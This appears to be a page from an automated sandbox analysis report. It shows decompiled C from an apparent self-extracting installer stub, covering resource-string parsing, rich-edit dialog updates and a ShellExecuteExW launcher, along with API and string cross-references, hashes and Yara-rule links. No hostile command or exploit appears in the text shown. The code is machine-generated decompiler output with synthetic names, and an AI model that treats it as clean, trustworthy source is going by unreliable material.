												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												L77:
												__eflags = _t352 -  *(_t394 - 0x30);
												if(_t352 !=  *(_t394 - 0x30)) {
													L51:
													_t340 =  *(_t394 - 0x14);
													goto L52;
												}
												L78:
												_t387 = _t387 + 1;
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												goto L77;
											}
										}
										_t393 =  *(_t394 - 0x1c);
										_t274 = _t232 | 0xffffffff;
										__eflags = _t274;
										 *(_t394 - 0x2c) = _t274;
										 *(_t394 - 0x50) = L"STRINGS";
										 *(_t394 - 0x4c) = L"DIALOG";
										 *(_t394 - 0x48) = L"MENU";
										 *(_t394 - 0x44) = L"DIRECTION";
										 *(_t394 - 0x24) = _t320;
										do {
											 *(_t394 - 0x24) = E001835B3( *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)));
											_t276 = E00185808(_t393 + 2 + _t387 * 2,  *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)), _t275);
											_t398 = _t398 + 0x10;
											_t379 = 0x20;
											__eflags = _t276;
											if(_t276 != 0) {
												L47:
												_t277 =  *(_t394 - 0x2c);
												goto L48;
											}
											_t361 =  *(_t394 - 0x24) + _t387;
											__eflags =  *((intOrPtr*)(_t393 + 2 + _t361 * 2)) - _t379;
											if( *((intOrPtr*)(_t393 + 2 + _t361 * 2)) > _t379) {
												goto L47;
											}
											_t277 = _t320;
											_t107 = _t361 + 1; // 0x200001
											_t387 = _t107;
											 *(_t394 - 0x2c) = _t277;
											L48:
											_t320 = _t320 + 1;
											__eflags = _t320 - 4;
										} while (_t320 < 4);
										_t391 =  *((intOrPtr*)(_t394 - 0x3c));
										_t320 = 0;
										__eflags = _t277;
										if(__eflags != 0) {
											_t232 =  *(_t394 - 0x1c);
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												L60:
												__eflags = _t355 -  *(_t394 - 0x30);
												if(_t355 !=  *(_t394 - 0x30)) {
													_t380 = _t232 + _t387 * 2;
													 *(_t394 - 0x24) = _t320;
													_t278 = 0x20;
													_t356 = _t320;
													__eflags =  *_t380 - _t278;
													if( *_t380 <= _t278) {
														L66:
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = 0;
														E00171596(_t394 - 0x214, _t394 - 0xe8, 0x64);
														_t387 = _t387 +  *(_t394 - 0x24);
														_t283 =  *(_t394 - 0x2c);
														__eflags = _t283 - 3;
														if(_t283 != 3) {
															__eflags = _t283 - 1;
															_t284 = "$%s:";
															if(_t283 != 1) {
																_t284 = "@%s:";
															}
															E0016DD6B(_t394 - 0x14c, 0x64, _t284, _t394 - 0xe8);
															_t398 = _t398 + 0x10;
														} else {
															_t288 = E001835E9(_t394 - 0x214, _t394 - 0x214, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t391 + 0x64)) =  ~_t288 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t356 - 0x63;
														if(_t356 >= 0x63) {
															break;
														}
														_t291 =  *_t380;
														_t380 = _t380 + 2;
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = _t291;
														_t356 = _t356 + 1;
														_t292 = 0x20;
														__eflags =  *_t380 - _t292;
														if( *_t380 > _t292) {
															continue;
														}
														break;
													}
													 *(_t394 - 0x24) = _t356;
													goto L66;
												}
												L61:
												_t387 = _t387 + 1;
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												goto L60;
											}
										}
										E0016FDFB(_t394 - 0x14c, 0x1938f4, 0x64);
										goto L51;
									}
									_t83 = _t394 - 0x38; // 0xa
									__eflags = _t377 -  *_t83;
									if(_t377 !=  *_t83) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t387 -  *(_t394 - 0x20);
								} while (_t387 <  *(_t394 - 0x20));
								_t222 =  *(_t394 - 0x10);
								_t375 =  *(_t394 - 0x28);
								goto L54;
							} else {
								L001835CE(_t386);
								goto L57;
							}
						}
						_t337 = _t332 >> 1;
						 *(_t394 - 0x20) = _t337;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00173781(_t391, _t374, _t384);
						E00173781(_t391 + 0x14, _t374, _t384);
						_t384 = _t384 + 1;
						_t403 = _t384 -  *0x19e5f4; // 0x63
					} while (_t403 < 0);
					_t320 = 0;
					goto L7;
				}
			}

0x0016d341
0x0016d341
0x0016d346
0x0016d350
0x0016d35a
0x0016d35b
0x0016d35c
0x0016d35f
0x0016d361
0x0016d364
0x0016d367
0x0016d36d
0x0016d36f
0x0016d372
0x0016d378
0x0016d3b4
0x0016d37a
0x0016d382
0x0016d39a
0x0016d3a4
0x0016d3a4
0x0016d3bf
0x0016d3c4
0x0016d3cc
0x0016d3cf
0x0016d3dd
0x0016d7a0
0x0016d7a6
0x0016d7b1
0x0016d7bb
0x0016d3e3
0x0016d3e3
0x0016d3e5
0x0016d3eb
0x0016d409
0x0016d415
0x0016d427
0x0016d42c
0x0016d42f
0x0016d432
0x0016d435
0x0016d438
0x0016d43b
0x0016d44f
0x0016d464
0x0016d469
0x0016d46c
0x0016d46e
0x0016d46e
0x0016d471
0x0016d476
0x0016d535
0x0016d535
0x0016d538
0x0016d53b
0x0016d54c
0x0016d554
0x0016d555
0x0016d558
0x0016d55d
0x00000000
0x00000000
0x0016d563
0x0016d566
0x00000000
0x00000000
0x00000000
0x0016d566
0x00000000
0x0016d47c
0x0016d484
0x0016d4af
0x0016d4b1
0x0016d4ba
0x0016d4e5
0x0016d4ed
0x0016d519
0x0016d519
0x0016d51d
0x00000000
0x00000000
0x0016d51f
0x00000000
0x0016d4f9
0x0016d509
0x0016d50e
0x0016d513
0x00000000
0x00000000
0x00000000
0x0016d513
0x0016d4ed
0x0016d4c2
0x0016d4c8
0x0016d4d9
0x0016d4de
0x0016d4e3
0x0016d527
0x00000000
0x0016d527
0x0016d4e3
0x00000000
0x0016d490
0x0016d4a0
0x0016d4a5
0x0016d4aa
0x0016d52b
0x0016d52b
0x0016d52e
0x0016d530
0x00000000
0x0016d530
0x0016d4ac
0x00000000
0x0016d4ac
0x0016d484
0x0016d47c
0x0016d575
0x0016d578
0x0016d57d
0x0016d587
0x0016d589
0x0016d58d
0x0016d58f
0x00000000
0x00000000
0x0016d5a6
0x0016d5ab
0x0016d5ae
0x0016d5b0
0x0016d5c0
0x0016d5c1
0x0016d5c6
0x0016d5ca
0x0016d5cc
0x00000000
0x00000000
0x0016d5d2
0x0016d5d5
0x0016d5d8
0x0016d5dc
0x0016d5e2
0x0016d5e7
0x0016d5eb
0x0016d5ee
0x0016d5f1
0x0016d5f1
0x0016d5f6
0x0016d5f8
0x0016d5fa
0x0016d5fa
0x0016d600
0x0016d610
0x0016d615
0x0016d61a
0x0016d61f
0x0016d623
0x0016d625
0x0016d633
0x0016d637
0x0016d639
0x0016d63b
0x0016d63e
0x0016d644
0x0016d646
0x0016d649
0x0016d731
0x0016d73d
0x0016d745
0x0016d74d
0x0016d754
0x0016d757
0x0016d771
0x0016d77e
0x0016d786
0x0016d798
0x00000000
0x00000000
0x00000000
0x00000000
0x0016d759
0x0016d759
0x0016d75d
0x0016d766
0x0016d76b
0x0016d76c
0x0016d76c
0x00000000
0x0016d759
0x0016d64f
0x0016d656
0x0016d65d
0x0016d664
0x0016d664
0x0016d667
0x0016d669
0x0016d97c
0x0016d97c
0x0016d980
0x0016d981
0x0016d984
0x00000000
0x00000000
0x0016d98a
0x0016d98e
0x0016d9e0
0x0016d9e1
0x0016d9e4
0x0016da0a
0x0016da1a
0x0016da1f
0x0016da25
0x0016da27
0x0016da02
0x0016da02
0x00000000
0x0016da02
0x0016d9e8
0x0016d9e9
0x0016d9ec
0x00000000
0x00000000
0x0016d9ee
0x0016d9ee
0x0016d9f4
0x00000000
0x00000000
0x0016d9fd
0x0016da01
0x0016da01
0x00000000
0x0016da01
0x0016d990
0x0016d996
0x00000000
0x00000000
0x0016d9a0
0x0016d9a0
0x0016d9a3
0x0016d9ca
0x0016d9cc
0x0016d9cf
0x0016d9d0
0x0016d9d4
0x0016d9d5
0x0016d9d8
0x00000000
0x0016d9d8
0x0016d9a5
0x0016d9a5
0x0016d9a8
0x0016d9c6
0x00000000
0x0016d9c6
0x0016d9aa
0x0016d9aa
0x0016d9ad
0x0016d9c2
0x00000000
0x0016d9c2
0x0016d9af
0x0016d9af
0x0016d9b2
0x0016d9be
0x00000000
0x0016d9be
0x0016d9b5
0x0016d9b8
0x00000000
0x00000000
0x0016d9ba
0x00000000
0x0016d9ba
0x0016d66f
0x0016d674
0x0016d678
0x0016d684
0x0016d686
0x0016d687
0x0016d68b
0x0016d880
0x0016d883
0x0016d88a
0x0016d88f
0x0016d891
0x0016d976
0x0016d976
0x0016d979
0x00000000
0x0016d979
0x0016d8a3
0x0016d8b4
0x0016d8b9
0x0016d8be
0x0016d8c0
0x00000000
0x00000000
0x0016d8c8
0x0016d8db
0x0016d8f0
0x0016d905
0x0016d91a
0x0016d932
0x0016d937
0x0016d93a
0x0016d93c
0x0016d93e
0x0016d93e
0x0016d941
0x0016d947
0x0016d947
0x0016d95a
0x0016d95a
0x0016d95c
0x0016d95f
0x0016d960
0x0016d960
0x0016d964
0x0016d967
0x00000000
0x00000000
0x0016d969
0x0016d969
0x0016d96d
0x0016d71f
0x0016d71f
0x00000000
0x0016d71f
0x0016d973
0x0016d973
0x0016d960
0x0016d964
0x0016d967
0x00000000
0x00000000
0x00000000
0x0016d967
0x0016d960
0x0016d691
0x0016d694
0x0016d694
0x0016d697
0x0016d69a
0x0016d6a1
0x0016d6a8
0x0016d6af
0x0016d6b6
0x0016d6b9
0x0016d6ca
0x0016d6d1
0x0016d6d6
0x0016d6db
0x0016d6dc
0x0016d6de
0x0016d6f6
0x0016d6f6
0x00000000
0x0016d6f6
0x0016d6e3
0x0016d6e5
0x0016d6ea
0x00000000
0x00000000
0x0016d6ec
0x0016d6ee
0x0016d6ee
0x0016d6f1
0x0016d6f9
0x0016d6f9
0x0016d6fa
0x0016d6fa
0x0016d6ff
0x0016d702
0x0016d704
0x0016d706
0x0016d7be
0x0016d7c1
0x00000000
0x00000000
0x00000000
0x00000000
0x0016d7c7
0x0016d7c7
0x0016d7c7
0x0016d7cb
0x0016d7ce
0x00000000
0x00000000
0x0016d7d0
0x0016d7d0
0x0016d7d4
0x0016d7d9
0x0016d7dc
0x0016d7e1
0x0016d7e2
0x0016d7e4
0x0016d7e7
0x0016d808
0x0016d80a
0x0016d822
0x0016d827
0x0016d82a
0x0016d82d
0x0016d830
0x0016d853
0x0016d856
0x0016d85b
0x0016d85d
0x0016d85d
0x0016d873
0x0016d878
0x0016d832
0x0016d83e
0x0016d846
0x0016d84b
0x0016d84b
0x00000000
0x00000000
0x00000000
0x00000000
0x0016d7e9
0x0016d7e9
0x0016d7e9
0x0016d7ec
0x00000000
0x00000000
0x0016d7ee
0x0016d7f1
0x0016d7f4
0x0016d7fc
0x0016d7ff
0x0016d800
0x0016d803
0x00000000
0x00000000
0x00000000
0x0016d803
0x0016d805
0x00000000
0x0016d805
0x0016d7d6
0x0016d7d6
0x0016d7c7
0x0016d7c7
0x0016d7cb
0x0016d7ce
0x00000000
0x00000000
0x00000000
0x0016d7ce
0x0016d7c7
0x0016d71a
0x00000000
0x0016d71a
0x0016d67a
0x0016d67a
0x0016d67e
0x00000000
0x00000000
0x00000000
0x0016d722
0x0016d722
0x0016d722
0x0016d72b
0x0016d72e
0x00000000
0x0016d627
0x0016d628
0x00000000
0x0016d62d
0x0016d625
0x0016d5b2
0x0016d5b4
0x00000000
0x00000000
0x00000000
0x00000000
0x0016d3ed
0x0016d3ed
0x0016d3f0
0x0016d3f9
0x0016d3fe
0x0016d3ff
0x0016d3ff
0x0016d407
0x00000000
0x0016d407

APIs

__EH_prolog.LIBCMT ref: 0016D346
_wcschr.LIBVCRUNTIME ref: 0016D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0016D328,?), ref: 0016D382
__fprintf_l.LIBCMT ref: 0016D873

Part of subcall function 0017137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0016B652,00000000,?,?,?,000502BE), ref: 00171396

Strings

RTL, xrefs: 0016D838
a, xrefs: 0016D4EF
, xrefs: 0016D67A
R, xrefs: 0016D4E5
*messages***, xrefs: 0016D4D3
*messages***, xrefs: 0016D49A
@%s:, xrefs: 0016D85D, 0016D869
,, xrefs: 0016D8AE
$%s:, xrefs: 0016D856

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: c681c12c048884679cb069e28ed23edac5b5e26b914ef3103c41be3f2ba5c046
Instruction ID: 404e66c12e77f525cdd1cd016d8b5889d6fe6627d70cb2470cf3fa6272a7eed3
Opcode Fuzzy Hash: c681c12c048884679cb069e28ed23edac5b5e26b914ef3103c41be3f2ba5c046
Instruction Fuzzy Hash: 1212D2B1E002199ADF24EFA4EC81BEEB7B9FF14704F14416AF516A7181EB709E50CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0017CB5A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0017CB5A() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E0017AC74(); // executed
				_t46 = GetDlgItem( *0x1a8458, 0x68);
				_t49 =  *0x1a8463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0x1a8440; // 0x0
					E001789EE(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0x1935b4);
					 *0x1a8463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}

0x0017cb61
0x0017cb7b
0x0017cb80
0x0017cb86
0x0017cb88
0x0017cb8e
0x0017cb96
0x0017cba1
0x0017cbaf
0x0017cbb5
0x0017cbb5
0x0017cbc5
0x0017cbcf
0x0017cbdf
0x0017cbe7
0x0017cbeb
0x0017cbf0
0x0017cbf6
0x0017cc01
0x0017cc0b
0x0017cc13
0x0017cc13
0x0017cc23
0x0017cc31
0x0017cc40
0x0017cc48
0x0017cc56
0x0017cc67
0x0017cc67
0x0017cc83

APIs

Part of subcall function 0017AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0017AC85
Part of subcall function 0017AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0017AC96
Part of subcall function 0017AC74: IsDialogMessageW.USER32(000502BE,?), ref: 0017ACAA
Part of subcall function 0017AC74: TranslateMessage.USER32(?), ref: 0017ACB8
Part of subcall function 0017AC74: DispatchMessageW.USER32(?), ref: 0017ACC2

GetDlgItem.USER32(00000068,001BECB0), ref: 0017CB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0017A632,00000001,?,?,0017AECB,00194F88,001BECB0), ref: 0017CB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0017CBA1
SendMessageW.USER32(00000000,000000C2,00000000,001935B4), ref: 0017CBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0017CBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0017CBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0017CC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0017CC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0017CC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0017CC67
SendMessageW.USER32(00000000,000000C2,00000000,0019431C), ref: 0017CC76

Strings

\, xrefs: 0017CBCF

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 2ef40b1450d19ff8858e402b40606847daec509e7d1958f6fcd0ce1b28e22cb6
Instruction ID: 17ac0070bfb89a1adba72ac888fc1fe7a2551c4dec1b21d3a7dc296941600637
Opcode Fuzzy Hash: 2ef40b1450d19ff8858e402b40606847daec509e7d1958f6fcd0ce1b28e22cb6
Instruction Fuzzy Hash: EA31FF71184342AFE301DF20DC4AFAF7FACEB86744F000509F65096191DB748A58CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 0017CE22, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0017CE22(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t55;
				signed int _t58;
				signed short* _t59;
				long _t70;
				int _t79;
				intOrPtr _t82;
				signed int _t83;
				signed short* _t84;
				signed short _t85;
				long _t88;
				signed short* _t89;
				void* _t90;
				signed short* _t93;
				struct HWND__* _t95;
				void* _t96;
				void* _t97;
				void* _t100;

				_t96 = __ebp;
				_t55 = 0x1040;
				E0017E360();
				_t93 = _a4168;
				_t79 = 0;
				if( *_t93 == 0) {
					L55:
					return _t55;
				}
				_t55 = E001835B3(_t93);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t88 = 0x3c;
					E0017F350(_t88,  &_a4, 0, _t88);
					_t82 = _a4176;
					_t100 = _t100 + 0xc;
					_a4.cbSize = _t88;
					_a8 = 0x1c0;
					if(_t82 != 0) {
						_a8 = 0x5c0;
					}
					_t83 =  *_t93 & 0x0000ffff;
					_t89 =  &(_t93[1]);
					_push(_t96);
					_t97 = 0x22;
					if(_t83 != _t97) {
						_t89 = _t93;
					}
					_a20 = _t89;
					_t58 = _t79;
					if(_t83 == 0) {
						L13:
						_t59 = _a24;
						L14:
						if(_t59 == 0 ||  *_t59 == _t79) {
							if(_t82 == 0 &&  *0x1ab472 != _t79) {
								_a24 = 0x1ab472;
							}
						}
						_a32 = _a4172;
						_t90 = E0016B493(_t89);
						if(_t90 != 0 && E001717AC(_t90, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E0016A180(_a20) != 0) {
							E0016B239(_a20,  &_a64, 0x800);
							_a8 =  &_a52;
						}
						_t55 = ShellExecuteExW( &_a4); // executed
						if(_t55 != 0) {
							_t95 = _a4160;
							if( *0x1a9468 != _t79 || _a4172 != _t79 ||  *0x1bec99 != _t79) {
								if(_t95 != 0) {
									_push(_t95);
									if( *0x1c20ac() != 0) {
										ShowWindow(_t95, _t79);
										_t79 = 1;
									}
								}
								 *0x1c20a8(_a56, 0x7d0);
								E0017D2E6(_a48);
								if( *0x1bec99 != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t70 = _v12;
									if(_t70 >  *0x1bec9c) {
										 *0x1bec9c = _t70;
									}
									 *0x1bec9a = 1;
								}
							}
							CloseHandle(_a48);
							if(_t90 == 0 || E001717AC(_t90, L".exe") != 0) {
								_t55 = _a4164;
								if( *0x1a9468 != 0 && _t55 == 0 &&  *0x1bec99 == _t55) {
									 *0x1beca0 = 0x1b58;
								}
							} else {
								_t55 = _a4164;
							}
							if(_t79 != 0 && _t55 != 0) {
								_t55 = ShowWindow(_t95, 1);
							}
						}
						goto L55;
					}
					_t84 = _t93;
					_v0 = 0x20;
					do {
						if( *_t84 == _t97) {
							while(1) {
								_t58 = _t58 + 1;
								if(_t93[_t58] == _t79) {
									break;
								}
								if(_t93[_t58] == _t97) {
									_t85 = _v0;
									_t93[_t58] = _t85;
									L10:
									if(_t93[_t58] == _t85 ||  *((short*)(_t93 + 2 + _t58 * 2)) == 0x2f) {
										if(_t93[_t58] == _v0) {
											_t93[_t58] = 0;
										}
										_t59 =  &(_t93[_t58 + 1]);
										_a24 = _t59;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t85 = _v0;
						goto L10;
						L12:
						_t58 = _t58 + 1;
						_t84 =  &(_t93[_t58]);
					} while ( *_t84 != _t79);
					goto L13;
				}
			}

0x0017ce22
0x0017ce22
0x0017ce27
0x0017ce2e
0x0017ce35
0x0017ce3a
0x0017d08b
0x0017d093
0x0017d093
0x0017ce41
0x0017ce4c
0x00000000
0x0017ce52
0x0017ce55
0x0017ce5d
0x0017ce62
0x0017ce69
0x0017ce6c
0x0017ce70
0x0017ce7a
0x0017ce7c
0x0017ce7c
0x0017ce84
0x0017ce87
0x0017ce8a
0x0017ce8d
0x0017ce91
0x0017ce93
0x0017ce93
0x0017ce95
0x0017ce99
0x0017ce9e
0x0017ced6
0x0017ced6
0x0017ceda
0x0017cedd
0x0017cee6
0x0017cef1
0x0017cef1
0x0017cee6
0x0017cf01
0x0017cf0a
0x0017cf0e
0x0017cf1f
0x0017cf1f
0x0017cf32
0x0017cf42
0x0017cf4b
0x0017cf4b
0x0017cf54
0x0017cf5c
0x0017cf62
0x0017cf6f
0x0017cf84
0x0017cf86
0x0017cf8f
0x0017cf93
0x0017cf99
0x0017cf99
0x0017cf8f
0x0017cfa4
0x0017cfae
0x0017cfba
0x0017cfd9
0x0017cfe3
0x0017cfe5
0x0017cfe5
0x0017cfea
0x0017cfea
0x0017cfba
0x0017cff5
0x0017cffd
0x0017d015
0x0017d01c
0x0017d02a
0x0017d02a
0x0017d072
0x0017d072
0x0017d072
0x0017d07b
0x0017d084
0x0017d084
0x0017d07b
0x00000000
0x0017d08a
0x0017cea0
0x0017cea2
0x0017ceaa
0x0017cead
0x0017d03c
0x0017d03c
0x0017d041
0x00000000
0x00000000
0x0017d03a
0x0017d048
0x0017d04c
0x0017ceb7
0x0017cebb
0x0017d05d
0x0017d061
0x0017d061
0x0017d066
0x0017d069
0x00000000
0x00000000
0x00000000
0x00000000
0x0017cebb
0x0017d03a
0x0017d043
0x0017ceb3
0x00000000
0x0017cecd
0x0017cecd
0x0017cece
0x0017ced1
0x00000000
0x0017ceaa

APIs

ShellExecuteExW.SHELL32(?), ref: 0017CF54
ShowWindow.USER32(?,00000000), ref: 0017CF93
GetExitCodeProcess.KERNEL32 ref: 0017CFCF
CloseHandle.KERNEL32(?), ref: 0017CFF5
ShowWindow.USER32(?,00000001), ref: 0017D084

Part of subcall function 001717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0016BB05,00000000,.exe,?,?,00000800,?,?,001785DF,?), ref: 001717C2

Strings

.exe, xrefs: 0017CFFF
, xrefs: 0017CEA2
.inf, xrefs: 0017CF10

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 0aa6e03780f4daa8d2361aa33a63ea19a396ef3a04efe2c600b9872827076ba7
Instruction ID: 0f4ce54b03fa08a42c7204cb0e9f6aae832744d44796551ab913f23561dc432f
Opcode Fuzzy Hash: 0aa6e03780f4daa8d2361aa33a63ea19a396ef3a04efe2c600b9872827076ba7
Instruction Fuzzy Hash: EE61D370408384ABDB319F24E804AABBBF6EF95304F04C91EF5C997251DBB19985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0018A058, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0018A058(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x19e668; // 0xd6971696
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0018E6ED(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0017EC4A(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0018A2C0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0018A72C(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0018A2C0(_t101);
									goto L36;
								}
								_t62 = E0018A72C(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0018A2C0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
